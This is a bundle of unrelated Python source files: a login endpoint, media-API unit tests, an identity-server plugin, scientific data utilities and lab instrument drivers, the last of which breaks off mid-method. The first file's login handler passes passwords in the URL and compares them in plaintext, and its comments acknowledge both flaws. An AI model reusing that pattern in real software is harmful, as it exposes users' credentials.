from ApiObject import *
class connect(ApiObject):
    def __init__(self):
        super(connect, self).__init__()
        # NOTE: credentials in the URI leak into server logs and browser history;
        # kept as-is to match the existing route layout.
        self.uri = self.uri + "/<username>/<password>"
    def get(self, **url_params):
        return super(connect, self).get()
    def on_get(self, **url_params):
        content = self.db_service.get_content_where("accounts", "erp", "name", url_params['username'])
        if not content:
            # unknown username: avoid an IndexError and treat it as a failed login
            return "unauthorized"
        _id, name, pwd, creationdate = content[:4]
        # NOTE: plaintext password comparison; salted hashes would be safer.
        if name == url_params['username'] and pwd == url_params['password']:
            return "authorized"
        return "unauthorized"
|
import unittest
import json
from bitmovin import Bitmovin, Response, S3Input
from bitmovin.errors import BitmovinApiError
from tests.bitmovin import BitmovinTestCase
class S3InputTests(BitmovinTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
@classmethod
def tearDownClass(cls):
super().tearDownClass()
def setUp(self):
super().setUp()
self.bitmovin = Bitmovin(self.api_key)
self.assertIsNotNone(self.bitmovin)
self.assertTrue(isinstance(self.bitmovin, Bitmovin))
def tearDown(self):
super().tearDown()
def test_create_s3_input(self):
(sample_input, sample_files) = self._get_sample_s3_input()
input_resource_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(input_resource_response)
self.assertIsNotNone(input_resource_response.resource)
self.assertIsNotNone(input_resource_response.resource.id)
self._compare_s3_inputs(sample_input, input_resource_response.resource)
def test_create_s3_input_without_name(self):
(sample_input, sample_files) = self._get_sample_s3_input()
sample_input.name = None
input_resource_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(input_resource_response)
self.assertIsNotNone(input_resource_response.resource)
self.assertIsNotNone(input_resource_response.resource.id)
self._compare_s3_inputs(sample_input, input_resource_response.resource)
def test_retrieve_s3_input(self):
(sample_input, sample_files) = self._get_sample_s3_input()
created_input_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(created_input_response)
self.assertIsNotNone(created_input_response.resource)
self.assertIsNotNone(created_input_response.resource.id)
self._compare_s3_inputs(sample_input, created_input_response.resource)
retrieved_input_response = self.bitmovin.inputs.S3.retrieve(created_input_response.resource.id)
self.assertIsNotNone(retrieved_input_response)
self.assertIsNotNone(retrieved_input_response.resource)
self._compare_s3_inputs(created_input_response.resource, retrieved_input_response.resource)
def test_delete_s3_input(self):
(sample_input, sample_files) = self._get_sample_s3_input()
created_input_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(created_input_response)
self.assertIsNotNone(created_input_response.resource)
self.assertIsNotNone(created_input_response.resource.id)
self._compare_s3_inputs(sample_input, created_input_response.resource)
deleted_minimal_resource = self.bitmovin.inputs.S3.delete(created_input_response.resource.id)
self.assertIsNotNone(deleted_minimal_resource)
self.assertIsNotNone(deleted_minimal_resource.resource)
self.assertIsNotNone(deleted_minimal_resource.resource.id)
try:
self.bitmovin.inputs.S3.retrieve(created_input_response.resource.id)
self.fail(
'Previous statement should have thrown an exception. ' +
'Retrieving input after deleting it shouldn\'t be possible.'
)
except BitmovinApiError:
pass
def test_list_s3_inputs(self):
(sample_input, sample_files) = self._get_sample_s3_input()
created_input_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(created_input_response)
self.assertIsNotNone(created_input_response.resource)
self.assertIsNotNone(created_input_response.resource.id)
self._compare_s3_inputs(sample_input, created_input_response.resource)
inputs = self.bitmovin.inputs.S3.list()
self.assertIsNotNone(inputs)
self.assertIsNotNone(inputs.resource)
self.assertIsNotNone(inputs.response)
self.assertIsInstance(inputs.resource, list)
self.assertIsInstance(inputs.response, Response)
        self.assertGreater(len(inputs.resource), 0)
def test_retrieve_s3_input_custom_data(self):
(sample_input, sample_files) = self._get_sample_s3_input()
sample_input.customData = '<pre>my custom data</pre>'
created_input_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(created_input_response)
self.assertIsNotNone(created_input_response.resource)
self.assertIsNotNone(created_input_response.resource.id)
self._compare_s3_inputs(sample_input, created_input_response.resource)
custom_data_response = self.bitmovin.inputs.S3.retrieve_custom_data(created_input_response.resource.id)
custom_data = custom_data_response.resource
self.assertEqual(sample_input.customData, json.loads(custom_data.customData))
def _compare_s3_inputs(self, first: S3Input, second: S3Input):
"""
:param first: S3Input
:param second: S3Input
:return: bool
"""
self.assertEqual(first.bucketName, second.bucketName)
self.assertEqual(first.cloudRegion, second.cloudRegion)
self.assertEqual(first.name, second.name)
self.assertEqual(first.description, second.description)
def _get_sample_s3_input(self):
s3_input_settings = self.settings.get('sampleObjects').get('inputs').get('s3')\
.get('9acae039-226b-46a3-8bae-706ae50b33c2')
files = s3_input_settings.get('files')
s3_input = S3Input(
access_key=s3_input_settings.get('accessKey'),
secret_key=s3_input_settings.get('secretKey'),
bucket_name=s3_input_settings.get('bucketName'),
cloud_region=s3_input_settings.get('cloudRegion'),
name='Sample S3 Input'
)
self.assertIsNotNone(s3_input.accessKey)
self.assertIsNotNone(s3_input.secretKey)
self.assertIsNotNone(s3_input.bucketName)
self.assertIsNotNone(s3_input.cloudRegion)
return s3_input, files
if __name__ == '__main__':
unittest.main()
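# A sketch of the settings structure that _get_sample_s3_input expects; every value
# below is a placeholder, only the key layout is taken from the code above:
#
# {
#     "sampleObjects": {
#         "inputs": {
#             "s3": {
#                 "9acae039-226b-46a3-8bae-706ae50b33c2": {
#                     "accessKey": "<AWS access key>",
#                     "secretKey": "<AWS secret key>",
#                     "bucketName": "<bucket name>",
#                     "cloudRegion": "<cloud region>",
#                     "files": ["<path/to/test/file>"]
#                 }
#             }
#         }
#     }
# }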
|
from ipaserver.plugins.user import user
from ipalib import Bytes, _
user.takes_params += (
Bytes(
'jpegphoto?',
cli_name='avatar',
label=_("Avatar"),
doc=_("Base-64 encoded user picture (jpegphoto)"),
maxlength=100 * 1024, # max 100 kB
),
)
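# A hedged usage sketch once the plugin is deployed; the ipalib client calls below
# follow the standard pattern, but the surrounding setup depends on the deployment:
#
# from ipalib import api
# api.bootstrap(context='client')
# api.finalize()
# api.Backend.rpcclient.connect()
# with open('avatar.jpg', 'rb') as f:
#     api.Command.user_mod(u'jdoe', jpegphoto=f.read())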
|
from Constant import PARAM_MAX_DELTAS, STATUS_CODES
def is_there_a_spike(sensor_reading, next_sensor_reading, max_delta):
    return next_sensor_reading - sensor_reading > max_delta
def detect_spike_in_sensor_stream(param_name, sensor_stream):
max_delta = PARAM_MAX_DELTAS[param_name]
for index, sensor_reading in enumerate(sensor_stream[:-1]):
next_sensor_reading = sensor_stream[index + 1]
if is_there_a_spike(sensor_reading, next_sensor_reading, max_delta):
return STATUS_CODES["500"]
return STATUS_CODES["200"]
def validate_sensor_stream(param_name, sensor_stream):
if sensor_stream is None:
return STATUS_CODES["400"]
if param_name not in PARAM_MAX_DELTAS:
return STATUS_CODES["404"]
return detect_spike_in_sensor_stream(param_name, sensor_stream)
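# A minimal usage sketch, assuming Constant defines something along the lines of
# PARAM_MAX_DELTAS = {"temperature": 15.0} and
# STATUS_CODES = {"200": 200, "400": 400, "404": 404, "500": 500}:
#
# readings = [98.1, 98.5, 99.0, 120.0]              # jump of 21.0 exceeds 15.0
# validate_sensor_stream("temperature", readings)   # -> STATUS_CODES["500"]
# validate_sensor_stream("temperature", None)       # -> STATUS_CODES["400"]
# validate_sensor_stream("unknown", readings)       # -> STATUS_CODES["404"]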
|
"""qp is a library for manaing and converting between different representations of distributions"""
import os
from .version import __version__
from .spline_pdf import *
from .hist_pdf import *
from .interp_pdf import *
from .quant_pdf import *
from .mixmod_pdf import *
from .sparse_pdf import *
from .scipy_pdfs import *
from .ensemble import Ensemble
from .factory import instance, add_class, create, read, convert, concatenate
from . import utils
from . import test_funcs
|
__all__ = ['OnnxTranspose']
from typing import List
from typing import Optional
import torch
from torch import nn
from onnx2torch.node_converters.registry import add_converter
from onnx2torch.onnx_graph import OnnxGraph
from onnx2torch.onnx_node import OnnxNode
from onnx2torch.utils.common import OnnxMapping
from onnx2torch.utils.common import OnnxToTorchModule
from onnx2torch.utils.common import OperationConverterResult
class OnnxTranspose(nn.Module, OnnxToTorchModule):
def __init__(self, perm: Optional[List[int]] = None):
super().__init__()
self.perm = perm
def forward(self, input_tensor: torch.Tensor) -> torch.Tensor:
        if self.perm is None:
            # ONNX default: reverse the dimension order on first use
            self.perm = list(range(input_tensor.dim()))[::-1]
return input_tensor.permute(self.perm)
@add_converter(operation_type='Transpose', version=1)
@add_converter(operation_type='Transpose', version=13)
def _(node: OnnxNode, graph: OnnxGraph) -> OperationConverterResult: # pylint: disable=unused-argument
input_values = [node.input_values[0]]
perm_value_name = node.input_values[1] if len(node.input_values) > 1 else None
if perm_value_name is not None:
perm = graph.initializers[perm_value_name].to_torch().tolist()
else:
perm = node.attributes.get('perm', None)
if perm is not None:
perm = torch.tensor(perm, dtype=torch.long).tolist()
return OperationConverterResult(
torch_module=OnnxTranspose(perm=perm),
onnx_mapping=OnnxMapping(
inputs=tuple(input_values),
outputs=node.output_values,
),
)
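# A short usage sketch of the module itself, independent of the ONNX graph conversion:
#
# transpose = OnnxTranspose(perm=[0, 2, 1])
# transpose(torch.randn(2, 3, 4)).shape   # -> torch.Size([2, 4, 3])
# # With perm=None the first call falls back to reversing all dimensions:
# OnnxTranspose()(torch.randn(2, 3, 4)).shape   # -> torch.Size([4, 3, 2])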
|
import collections
from typing import List
from test_framework import generic_test
PairedTasks = collections.namedtuple('PairedTasks', ('task_1', 'task_2'))
def optimum_task_assignment(task_durations: List[int]) -> List[PairedTasks]:
    # Greedy strategy: sort the durations, then pair the i-th smallest with the
    # i-th largest; this minimizes the largest pair sum, i.e. the completion time.
    task_durations.sort()
    return [
        PairedTasks(task_durations[i], task_durations[~i])
        for i in range(len(task_durations) // 2)
    ]
if __name__ == '__main__':
exit(
generic_test.generic_test_main('task_pairing.py', 'task_pairing.tsv',
optimum_task_assignment))
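# Example for the greedy pairing above: [5, 2, 1, 6, 4, 4] sorts to [1, 2, 4, 4, 5, 6]
# and yields the pairs (1, 6), (2, 5), (4, 4); the largest pair sum, 8, is the
# minimal possible completion time.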
|
"""Cadence bin.
Author: Jose Vines
"""
import numpy as np
def cadence_bin(times, data, dt):
"""Bins timeseries data with cadence dt.
Parameters:
-----------
times : array_like
The times to bin in cadence dt.
data : array_like
Data corresponding to time times.
dt : float
Time cadence to bin into in minutes.
Returns:
--------
binned_times : array_like
The binned times
binned_data : array_like
The binned data corresponding to the median of all the original
data values inside a bin.
binned_errs : array_like
The binned errors calculated as the square root of the variance of
the data inside a given bin, divided by the square root of the
number of data points inside the bin.
"""
    # Convert dt from minutes to days (the timestamps are assumed to be JD-like)
    dt *= 60 / 86400
# Grab initial and final time in the timeseries
ti = times[0]
tf = times[-1]
# Calculate number of bins
n = int(np.ceil((tf - ti) / dt))
binned_times = np.zeros(n - 1)
binned_data = np.zeros(n - 1)
binned_errs = np.zeros(n - 1)
t = np.linspace(ti, tf, n)
    for i in range(0, n - 1):
        # half-open bin [t[i], t[i + 1]); <= keeps points that fall exactly on the
        # lower edge, including times[0]
        in_bin = (t[i] <= times) & (times < t[i + 1])
        bin_n = np.count_nonzero(in_bin)
        if bin_n == 0:
            continue
        binned_times[i] = np.median(times[in_bin])
        binned_data[i] = np.median(data[in_bin])
        binned_errs[i] = np.sqrt(np.var(data[in_bin]) / bin_n)
no_zeroes = binned_times != 0
no_nans = ~np.isnan(binned_data)
binned_times = binned_times[no_zeroes * no_nans]
binned_data = binned_data[no_zeroes * no_nans]
binned_errs = binned_errs[no_zeroes * no_nans]
return binned_times, binned_data, binned_errs
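# A minimal usage sketch on synthetic data (times are assumed to be in days, JD-like):
if __name__ == "__main__":
    t = np.linspace(0., 1., 1440)  # one day sampled once per minute
    y = np.sin(2 * np.pi * t) + np.random.normal(0., 0.01, t.size)
    bt, by, be = cadence_bin(t, y, 30.)  # re-bin to a 30-minute cadence
    print(len(bt), "bins")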
|
from ...core.utils.py3 import textstring
from ...core.devio import SCPI, backend #@UnresolvedImport
_depends_local=["...core.devio.SCPI"]
class LM500(SCPI.SCPIDevice):
"""
Cryomagnetics LM500/510 level monitor.
Channels are enumerated from 1.
To abort filling or reset a timeout, call :meth:`.SCPIDevice.reset` method.
Args:
conn: serial connection parameters (usually port or a tuple containing port and baudrate)
"""
def __init__(self, conn):
conn=backend.SerialDeviceBackend.combine_conn(conn,("COM1",9600))
SCPI.SCPIDevice.__init__(self,conn,backend="serial")
self.instr.term_read="\n"
self.instr.term_write="\n"
        try:
            self.write("ERROR 0")
            self.write("REMOTE")
        except self.instr.Error:
            self.close()
            raise
self._add_settings_node("interval",self.get_interval,self.set_interval,ignore_error=(RuntimeError,))
self._add_status_node("level",self.get_level,mux=([1,2],))
self._add_status_node("fill_status",self.get_fill_status,mux=([1,2],))
self._add_settings_node("high_level",self.get_high_level,self.set_high_level,mux=([1,2],1))
self._add_settings_node("low_level",self.get_low_level,self.set_low_level,mux=([1,2],1))
def close(self):
"""Close connection to the device"""
try:
self.write("LOCAL")
finally:
SCPI.SCPIDevice.close(self)
_reset_comm="*RST;REMOTE"
def _instr_write(self, msg):
return self.instr.write(msg,read_echo=True,read_echo_delay=0.1)
def _instr_read(self, raw=False):
data=""
while not data:
data=self.instr.readline(remove_term=True).strip()
return data
def get_channel(self):
"""Get current measurement channel"""
return self.ask("CHAN?","int")
def set_channel(self, channel=1):
"""Set current measurement channel"""
self.write("CHAN",channel)
return self.get_channel()
def get_type(self, channel=1):
"""Get channel type (``"LHe"`` or ``"LN"``)"""
chan_type=self.ask("TYPE? {}".format(channel),"int")
return ["LHe","LN"][chan_type]
def _check_channel_LHe(self, op, channel=None):
if channel is None:
channel=self.get_channel()
if self.get_type(channel)=="LN":
raise RuntimeError("LN channel doesn't support {}".format(op))
def get_mode(self):
"""Get measurement mode at the current channel (``"S"`` for sample/hold, ``"C"`` for continuous)"""
self._check_channel_LHe("measurement modes")
return self.ask("MODE?").upper()
def set_mode(self, mode):
"""Set measurement mode at the current channel (``"S"`` for sample/hold, ``"C"`` for continuous)"""
self._check_channel_LHe("measurement modes")
self.write("MODE",mode)
return self.get_mode()
@staticmethod
def _str_to_sec(s):
s=s.strip().split(":")
s=[int(n.strip()) for n in s]
return s[0]*60**2+s[1]*60+s[2]
@staticmethod
def _sec_to_str(s):
return "{:02d}:{:02d}:{:02d}".format(int(s/60.**2),int((s/60.)%60.),int(s%60.))
def get_interval(self):
"""Get measurement interval in sample/hold mode (in seconds)"""
self._check_channel_LHe("measurement intervals")
return self._str_to_sec(self.ask("INTVL?"))
def set_interval(self, intvl):
"""Set measurement interval in sample/hold mode (in seconds)"""
self._check_channel_LHe("measurement intervals")
if not isinstance(intvl,textstring):
intvl=self._sec_to_str(intvl)
self.write("INTVL",intvl)
return self.get_interval()
def start_meas(self, channel=1):
"""Initialize measurement on a given channel"""
self.write("MEAS",channel)
def _get_stb(self):
return self.ask("*STB?","int")
def wait_meas(self, channel=1):
"""Wait for a measurement on a given channel to finish"""
mask=0x01 if channel==1 else 0x04
while not self._get_stb()&mask:
self.sleep(0.1)
def get_level(self, channel=1):
"""Get level reading on a given channel"""
res=self.ask("MEAS? {}".format(channel))
return float(res.split()[0])
def measure_level(self, channel=1):
"""Measure the level (initialize a measurement and return the result) on a given channel"""
self.start_meas(channel=channel)
self.wait_meas(channel=channel)
return self.get_level(channel=channel)
def start_fill(self, channel=1):
"""Initialize filling at a given channels"""
self.write("FILL",channel)
def get_fill_status(self, channel=1):
"""
        Get filling status on a given channel.
Return either ``"off"`` (filling is off), ``"timeout"`` (filling timed out) or a float (time since filling started, in seconds)
"""
res=self.ask("FILL? {}".format(channel)).lower()
if res in {"off","timeout"}:
return res
spres=res.split()
if len(spres)==1 or spres[1] in ["m","min"]:
return float(spres[0])*60.
if spres[1] in ["s","sec"]:
return float(spres[0])
raise ValueError("unexpected response: {}".format(res))
def get_low_level(self, channel=1):
"""Get low level setting on a given channel"""
self.set_channel(channel)
return float(self.ask("LOW?").split()[0])
def set_low_level(self, level, channel=1):
"""Set low level setting on a given channel"""
self.set_channel(channel)
self.write("LOW",level)
def get_high_level(self, channel=1):
"""Get high level setting on a given channel"""
self.set_channel(channel)
return float(self.ask("HIGH?").split()[0])
def set_high_level(self, level, channel=1):
"""Set high level setting on a given channel"""
self.set_channel(channel)
self.write("HIGH",level) |
import functools
import logging
import numbers
import sys
import weakref
import warnings
from typing import List, Tuple, Set, Callable, Optional, Any, cast, Union, Dict, Mapping, NamedTuple, Iterable,\
Collection, Sequence
from collections import OrderedDict
import numpy as np
from qupulse import ChannelID
from qupulse._program._loop import Loop, make_compatible
from qupulse.hardware.feature_awg.channel_tuple_wrapper import ChannelTupleAdapter
from qupulse.hardware.feature_awg.features import ChannelSynchronization, AmplitudeOffsetHandling, VoltageRange, \
ProgramManagement, ActivatableChannels, DeviceControl, StatusTable, SCPI, VolatileParameters, \
ReadProgram, RepetitionMode
from qupulse.hardware.util import voltage_to_uint16, find_positions
from qupulse.utils.types import TimeType
from qupulse.hardware.feature_awg.base import AWGChannelTuple, AWGChannel, AWGDevice, AWGMarkerChannel
from qupulse._program.tabor import TaborSegment, TaborException, TaborProgram, PlottableProgram, TaborSequencing, \
make_combined_wave
import tabor_control.device
import pyvisa
assert (sys.byteorder == "little")
__all__ = ["TaborDevice", "TaborChannelTuple", "TaborChannel"]
TaborProgramMemory = NamedTuple("TaborProgramMemory", [("waveform_to_segment", np.ndarray),
("program", TaborProgram)])
def with_configuration_guard(function_object: Callable[["TaborChannelTuple", Any], Any]) -> Callable[
["TaborChannelTuple"], Any]:
"""This decorator assures that the AWG is in configuration mode while the decorated method runs."""
@functools.wraps(function_object)
def guarding_method(channel_pair: "TaborChannelTuple", *args, **kwargs) -> Any:
if channel_pair._configuration_guard_count == 0:
channel_pair._enter_config_mode()
channel_pair._configuration_guard_count += 1
try:
return function_object(channel_pair, *args, **kwargs)
finally:
channel_pair._configuration_guard_count -= 1
if channel_pair._configuration_guard_count == 0:
channel_pair._exit_config_mode()
return guarding_method
def with_select(function_object: Callable[["TaborChannelTuple", Any], Any]) -> Callable[["TaborChannelTuple"], Any]:
"""Asserts the channel pair is selcted when the wrapped function is called"""
@functools.wraps(function_object)
def selector(channel_tuple: "TaborChannelTuple", *args, **kwargs) -> Any:
channel_tuple._select()
return function_object(channel_tuple, *args, **kwargs)
return selector
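# Usage note: the two decorators above are commonly stacked (see
# TaborProgramManagement.upload below); @with_configuration_guard keeps the device in
# configuration mode for the whole call and restores the previous mode afterwards,
# even if the wrapped method raises, while @with_select first selects the channel
# tuple the method operates on.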
########################################################################################################################
# Device
########################################################################################################################
# Features
class TaborSCPI(SCPI):
def __init__(self, device: "TaborDevice", visa: pyvisa.resources.MessageBasedResource):
super().__init__(visa)
self._parent = weakref.ref(device)
def send_cmd(self, cmd_str, paranoia_level=None):
for instr in self._parent().all_devices:
instr.send_cmd(cmd_str=cmd_str, paranoia_level=paranoia_level)
def send_query(self, query_str, query_mirrors=False) -> Any:
if query_mirrors:
return tuple(instr.send_query(query_str) for instr in self._parent().all_devices)
else:
return self._parent().main_instrument.send_query(query_str)
def _send_cmd(self, cmd_str, paranoia_level=None) -> Any:
"""Overwrite send_cmd for paranoia_level > 3"""
if paranoia_level is None:
paranoia_level = self._parent().paranoia_level
        if paranoia_level < 3:
            super().send_cmd(cmd_str=cmd_str, paranoia_level=paranoia_level)  # pragma: no cover
else:
cmd_str = cmd_str.rstrip()
if len(cmd_str) > 0:
ask_str = cmd_str + "; *OPC?; :SYST:ERR?"
else:
ask_str = "*OPC?; :SYST:ERR?"
*answers, opc, error_code_msg = self._parent()._visa_inst.ask(ask_str).split(";")
error_code, error_msg = error_code_msg.split(",")
error_code = int(error_code)
if error_code != 0:
_ = self._parent()._visa_inst.ask("*CLS; *OPC?")
if error_code == -450:
# query queue overflow
self.send_cmd(cmd_str)
else:
raise RuntimeError("Cannot execute command: {}\n{}: {}".format(cmd_str, error_code, error_msg))
assert len(answers) == 0
class TaborChannelSynchronization(ChannelSynchronization):
"""This Feature is used to synchronise a certain ammount of channels"""
def __init__(self, device: "TaborDevice"):
super().__init__()
self._parent = weakref.ref(device)
def synchronize_channels(self, group_size: int) -> None:
"""
        Synchronize in groups of `group_size` channels. Groups of synchronized channels will be provided as
        AWGChannelTuples. The total number of channels must be evenly divisible by `group_size`.
Args:
group_size: Number of channels per channel tuple
"""
if group_size == 2:
self._parent()._channel_tuples = []
            for i in range(len(self._parent().channels) // group_size):
self._parent()._channel_tuples.append(
TaborChannelTuple((i + 1),
self._parent(),
self._parent().channels[(i * group_size):((i * group_size) + group_size)],
self._parent().marker_channels[(i * group_size):((i * group_size) + group_size)])
)
self._parent()[SCPI].send_cmd(":INST:COUP:STAT OFF")
elif group_size == 4:
self._parent()._channel_tuples = [TaborChannelTuple(1,
self._parent(),
self._parent().channels,
self._parent().marker_channels)]
self._parent()[SCPI].send_cmd(":INST:COUP:STAT ON")
else:
raise TaborException("Invalid group size")
class TaborDeviceControl(DeviceControl):
"""This feature is used for basic communication with a AWG"""
def __init__(self, device: "TaborDevice"):
super().__init__()
self._parent = weakref.ref(device)
def reset(self) -> None:
"""
        Resets the whole device: a reset command is sent to the device, the device is initialized again, and
        all channel tuples are cleared.
"""
self._parent()[SCPI].send_cmd(":RES")
self._parent()._coupled = None
self._parent()._initialize()
for channel_tuple in self._parent().channel_tuples:
channel_tuple[TaborProgramManagement].clear()
def trigger(self) -> None:
"""
This method triggers a device remotely.
"""
self._parent()[SCPI].send_cmd(":TRIG")
class TaborStatusTable(StatusTable):
def __init__(self, device: "TaborDevice"):
super().__init__()
self._parent = device
def get_status_table(self) -> Dict[str, Union[str, float, int]]:
"""
        Sends a number of queries to the AWG about its settings. A good way to visualize the result is a pandas.DataFrame
Returns:
An ordered dictionary with the results
"""
name_query_type_list = [("channel", ":INST:SEL?", int),
("coupling", ":OUTP:COUP?", str),
("volt_dc", ":SOUR:VOLT:LEV:AMPL:DC?", float),
("volt_hv", ":VOLT:HV?", float),
("offset", ":VOLT:OFFS?", float),
("outp", ":OUTP?", str),
("mode", ":SOUR:FUNC:MODE?", str),
("shape", ":SOUR:FUNC:SHAPE?", str),
("dc_offset", ":SOUR:DC?", float),
("freq_rast", ":FREQ:RAST?", float),
("gated", ":INIT:GATE?", str),
("continuous", ":INIT:CONT?", str),
("continuous_enable", ":INIT:CONT:ENAB?", str),
("continuous_source", ":INIT:CONT:ENAB:SOUR?", str),
("marker_source", ":SOUR:MARK:SOUR?", str),
("seq_jump_event", ":SOUR:SEQ:JUMP:EVEN?", str),
("seq_adv_mode", ":SOUR:SEQ:ADV?", str),
("aseq_adv_mode", ":SOUR:ASEQ:ADV?", str),
("marker", ":SOUR:MARK:SEL?", int),
("marker_high", ":MARK:VOLT:HIGH?", str),
("marker_low", ":MARK:VOLT:LOW?", str),
("marker_width", ":MARK:WIDT?", int),
("marker_state", ":MARK:STAT?", str)]
data = OrderedDict((name, []) for name, *_ in name_query_type_list)
for ch in (1, 2, 3, 4):
self._parent.channels[ch - 1]._select()
self._parent.marker_channels[(ch - 1) % 2]._select()
for name, query, dtype in name_query_type_list:
data[name].append(dtype(self._parent[SCPI].send_query(query)))
return data
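# Visualization sketch, as suggested in the docstring (assumes a connected TaborDevice
# instance named `device` and pandas installed):
#
# import pandas as pd
# df = pd.DataFrame(device[TaborStatusTable].get_status_table())  # one row per channel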
# Implementation
class TaborDevice(AWGDevice):
def __init__(self, device_name: str, instr_addr=None, paranoia_level=1, external_trigger=False, reset=False,
mirror_addresses=()):
"""
Constructor for a Tabor device
Args:
device_name (str): Name of the device
instr_addr: Instrument address that is forwarded to tabor_control
paranoia_level (int): Paranoia level that is forwarded to tabor_control
external_trigger (bool): Not supported yet
            reset (bool): If True, the device is reset right after the connection is established
            mirror_addresses: Addresses of devices that mirror every action performed on the main device.
                For example, you can drive a simulator and a real device at once.
"""
super().__init__(device_name)
self._instr = tabor_control.device.TEWXAwg(tabor_control.open_session(instr_addr), paranoia_level)
self._mirrors = tuple(tabor_control.device.TEWXAwg(tabor_control.open_session(address), paranoia_level)
for address in mirror_addresses)
self._coupled = None
self._clock_marker = [0, 0, 0, 0]
self.add_feature(TaborSCPI(self, self.main_instrument._visa_inst))
self.add_feature(TaborDeviceControl(self))
self.add_feature(TaborStatusTable(self))
if reset:
self[SCPI].send_cmd(":RES")
# Channel
self._channels = [TaborChannel(i + 1, self) for i in range(4)]
# MarkerChannels
self._marker_channels = [TaborMarkerChannel(i + 1, self) for i in range(4)]
self._initialize()
# ChannelTuple
self._channel_tuples = []
self.add_feature(TaborChannelSynchronization(self))
self[TaborChannelSynchronization].synchronize_channels(2)
if external_trigger:
raise NotImplementedError() # pragma: no cover
def enable(self) -> None:
"""
This method immediately generates the selected output waveform, if the device is in continuous and armed
repetition mode.
"""
self[SCPI].send_cmd(":ENAB")
def abort(self) -> None:
"""
With abort you can terminate the current generation of the output waveform. When the output waveform is
terminated the output starts generating an idle waveform.
"""
self[SCPI].send_cmd(":ABOR")
def set_coupled(self, coupled: bool) -> None:
"""
        Sets the coupling of the device to `coupled`
"""
if coupled:
self[SCPI].send_cmd("INST:COUP:STAT ON")
else:
self[SCPI].send_cmd("INST:COUP:STAT OFF")
def _is_coupled(self) -> bool:
"""
        Returns True if the device is coupled, False otherwise
"""
if self._coupled is None:
return self[SCPI].send_query(":INST:COUP:STAT?") == "ON"
else:
return self._coupled
def cleanup(self) -> None:
for channel_tuple in self.channel_tuples:
channel_tuple.cleanup()
@property
def channels(self) -> Collection["TaborChannel"]:
"""Returns a list of all channels of a Device"""
return self._channels
@property
def marker_channels(self) -> Collection["TaborMarkerChannel"]:
"""Returns a list of all marker channels of a device. The collection may be empty"""
return self._marker_channels
@property
def channel_tuples(self) -> Collection["TaborChannelTuple"]:
"""Returns a list of all channel tuples of a list"""
return self._channel_tuples
@property
def main_instrument(self) -> tabor_control.device.TEWXAwg:
return self._instr
@property
def mirrored_instruments(self) -> Sequence[tabor_control.device.TEWXAwg]:
return self._mirrors
@property
def all_devices(self) -> Sequence[tabor_control.device.TEWXAwg]:
return (self._instr,) + self._mirrors
@property
def _paranoia_level(self) -> tabor_control.ParanoiaLevel:
return self._instr.paranoia_level
@_paranoia_level.setter
def _paranoia_level(self, val):
for instr in self.all_devices:
instr.paranoia_level = val
@property
def dev_properties(self) -> dict:
return self._instr.dev_properties.as_dict()
def _send_binary_data(self, bin_dat, paranoia_level=None):
for instr in self.all_devices:
instr.write_segment_data(bin_dat, paranoia_level=paranoia_level)
def _download_segment_lengths(self, seg_len_list, paranoia_level=None):
for instr in self.all_devices:
instr.write_segment_lengths(seg_len_list, paranoia_level=paranoia_level)
def _download_sequencer_table(self, seq_table, paranoia_level=None):
for instr in self.all_devices:
instr.write_sequencer_table(seq_table, paranoia_level=paranoia_level)
def _download_adv_seq_table(self, seq_table, paranoia_level=None):
for instr in self.all_devices:
instr.write_advanced_sequencer_table(seq_table, paranoia_level=paranoia_level)
def _initialize(self) -> None:
# 1. Select channel
# 2. Turn off gated mode
        # 3. Turn on continuous mode
# 4. Armed mode (only generate waveforms after enab command)
# 5. Expect enable signal from (USB / LAN / GPIB)
# 6. Use arbitrary waveforms as marker source
# 7. Expect jump command for sequencing from (USB / LAN / GPIB)
setup_command = (
":INIT:GATE OFF; :INIT:CONT ON; "
":INIT:CONT:ENAB ARM; :INIT:CONT:ENAB:SOUR BUS;"
":SOUR:MARK:SOUR USER; :SOUR:SEQ:JUMP:EVEN BUS ")
self[SCPI].send_cmd(":INST:SEL 1")
self[SCPI].send_cmd(setup_command)
self[SCPI].send_cmd(":INST:SEL 3")
self[SCPI].send_cmd(setup_command)
def _get_readable_device(self, simulator=True) -> tabor_control.device.TEWXAwg:
"""
A method to get the first readable device out of all devices.
A readable device is a device which you can read data from like a simulator.
Returns:
The first readable device out of all devices
Throws:
TaborException: this exception is thrown if there is no readable device in the list of all devices
"""
for device in self.all_devices:
if device.supports_basic_reading():
if simulator:
if device.is_simulator:
return device
else:
return device
raise TaborException("No device capable of device data read")
########################################################################################################################
# Channel
########################################################################################################################
# Features
class TaborVoltageRange(VoltageRange):
def __init__(self, channel: "TaborChannel"):
super().__init__()
self._parent = weakref.ref(channel)
@property
@with_select
def offset(self) -> float:
"""Get offset of AWG channel"""
        return float(self._parent().device[SCPI].send_query(":VOLT:OFFS?"))
@property
@with_select
def amplitude(self) -> float:
"""Get amplitude of AWG channel"""
coupling = self._parent().device[SCPI].send_query(":OUTP:COUP?")
if coupling == "DC":
return float(self._parent().device[SCPI].send_query(":VOLT?"))
elif coupling == "HV":
return float(self._parent().device[SCPI].send_query(":VOLT:HV?"))
else:
raise TaborException("Unknown coupling: {}".format(coupling))
@property
def amplitude_offset_handling(self) -> AmplitudeOffsetHandling:
"""
Gets the amplitude and offset handling of this channel. The amplitude-offset controls if the amplitude and
offset settings are constant or if these should be optimized by the driver
"""
return self._parent()._amplitude_offset_handling
@amplitude_offset_handling.setter
def amplitude_offset_handling(self, amp_offs_handling: Union[AmplitudeOffsetHandling, str]) -> None:
"""
amp_offs_handling: See possible values at `AWGAmplitudeOffsetHandling`
"""
        amp_offs_handling = AmplitudeOffsetHandling(amp_offs_handling)
self._parent()._amplitude_offset_handling = amp_offs_handling
def _select(self) -> None:
self._parent()._select()
class TaborActivatableChannels(ActivatableChannels):
def __init__(self, channel: "TaborChannel"):
super().__init__()
self._parent = weakref.ref(channel)
@property
def enabled(self) -> bool:
"""
        Returns the current state of the channel: True if the output is enabled, False if it is disabled
"""
return self._parent().device[SCPI].send_query(":OUTP ?") == "ON"
@with_select
def enable(self):
"""Enables the output of a certain channel"""
command_string = ":OUTP ON".format(ch_id=self._parent().idn)
